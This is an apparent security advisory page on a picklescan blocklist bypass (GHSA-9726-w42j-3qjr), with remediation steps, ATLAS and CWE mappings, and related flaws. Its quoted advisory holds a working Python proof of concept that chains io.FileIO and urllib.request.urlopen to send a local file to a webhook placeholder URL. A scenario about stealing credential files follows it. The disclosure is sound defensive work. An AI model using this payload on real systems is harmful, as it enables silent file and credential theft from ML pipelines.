AI Threat Alert
picklescan is used as a security gate in ML pipelines to validate pickle files before loading — this vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. Attackers can craft malicious pickles that exfiltrate `/etc/passwd` and other sensitive files via SSRF without triggering RCE-focused blocklists. Upgrade picklescan to 0.0.35 immediately and audit any pickle files scanned by earlier versions as potentially untrusted.
What is the risk?
HIGH. The severity is amplified because the affected component is a security control itself, not just an application library — bypassing it silently degrades your entire pickle validation posture without raising alarms. Exploit complexity is low: a working PoC is public, requires no authentication, and chains two standard library modules that are unlikely to appear in RCE blocklists. AI/ML environments are uniquely exposed given the ubiquity of pickle for model and dataset serialization across training, fine-tuning, and serving pipelines.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.35 | 0.0.35 |
Do you use picklescan? You're affected.
How severe is it?
What should I do?
5 steps-
PATCH
Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan).
-
AUDIT
Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources.
-
MIGRATE
Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely.
-
NETWORK CONTROLS
Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes.
-
DETECT
Alert on outbound HTTP connections from processes performing model loading. Monitor for
io.FileIOorurllib.requestpatterns in pickle scanning logs if running custom detection.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-9726-w42j-3qjr?
picklescan is used as a security gate in ML pipelines to validate pickle files before loading — this vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. Attackers can craft malicious pickles that exfiltrate `/etc/passwd` and other sensitive files via SSRF without triggering RCE-focused blocklists. Upgrade picklescan to 0.0.35 immediately and audit any pickle files scanned by earlier versions as potentially untrusted.
Is GHSA-9726-w42j-3qjr actively exploited?
No confirmed active exploitation of GHSA-9726-w42j-3qjr has been reported, but organizations should still patch proactively.
How to fix GHSA-9726-w42j-3qjr?
1. PATCH: Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan). 2. AUDIT: Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources. 3. MIGRATE: Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely. 4. NETWORK CONTROLS: Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes. 5. DETECT: Alert on outbound HTTP connections from processes performing model loading. Monitor for `io.FileIO` or `urllib.request` patterns in pickle scanning logs if running custom detection.
What systems are affected by GHSA-9726-w42j-3qjr?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data preprocessing pipelines.
What is the CVSS score for GHSA-9726-w42j-3qjr?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0011.000 Unsafe AI Artifacts AML.T0025 Exfiltration via Cyber Means AML.T0037 Data from Local System AML.T0107 Exploitation for Defense Evasion Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server. ### Details The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features: 1. io.FileIO: Opens local files without using builtins.open. 2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request. 3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling. ### PoC ```python import pickle, io, urllib.request class GetFile: def __reduce__(self): return (io.FileIO, ('/etc/hosts', 'r')) class Exfiltrate: def __reduce__(self): return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile())) with open("bypass_http.pkl", "wb") as f: pickle.dump(Exfiltrate(), f) ``` <img width="650" height="114" alt="Screenshot 2025-12-30 at 10 13 14 PM" src="https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994" /> ### Impact - Arbitrary file read Thanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE` kind of vulnerabilities rather adding `File IO`, `Http` or any protocol based may cause lot of noise, feel free to close this issue.
Exploitation Scenario
An adversary targets an organization's model hub or shared ML artifact repository. They upload a poisoned model checkpoint serialized as a malicious pickle using the PoC technique — chaining `io.FileIO('/etc/passwd', 'r')` as the body of a `urllib.request.urlopen` POST to an attacker-controlled webhook. The organization's CI/CD pipeline runs picklescan (< 0.0.35) on incoming artifacts; the file passes as clean because it contains no `os.system`, `exec`, or other RCE-pattern opcodes. A downstream data scientist or automated pipeline loads the checkpoint into a training job. At deserialization, the server streams its `/etc/passwd` — or more critically, cloud credential files like `~/.aws/credentials` or mounted secrets — directly to the attacker's server, all before any model code executes.
Weaknesses (CWE)
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Primary
CWE-918 Server-Side Request Forgery (SSRF)
Primary
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
CVE-2026-3490 10.0 picklescan: blocklist bypass enables full RCE
Same package: picklescan GHSA-vvpj-8cmc-gx39 10.0 picklescan: security flaw enables exploitation
Same package: picklescan GHSA-g38g-8gr9-h9xp 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan CVE-2025-1945 9.8 picklescan: ZIP flag bypass enables RCE in PyTorch models
Same package: picklescan GHSA-7wx9-6375-f5wh 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan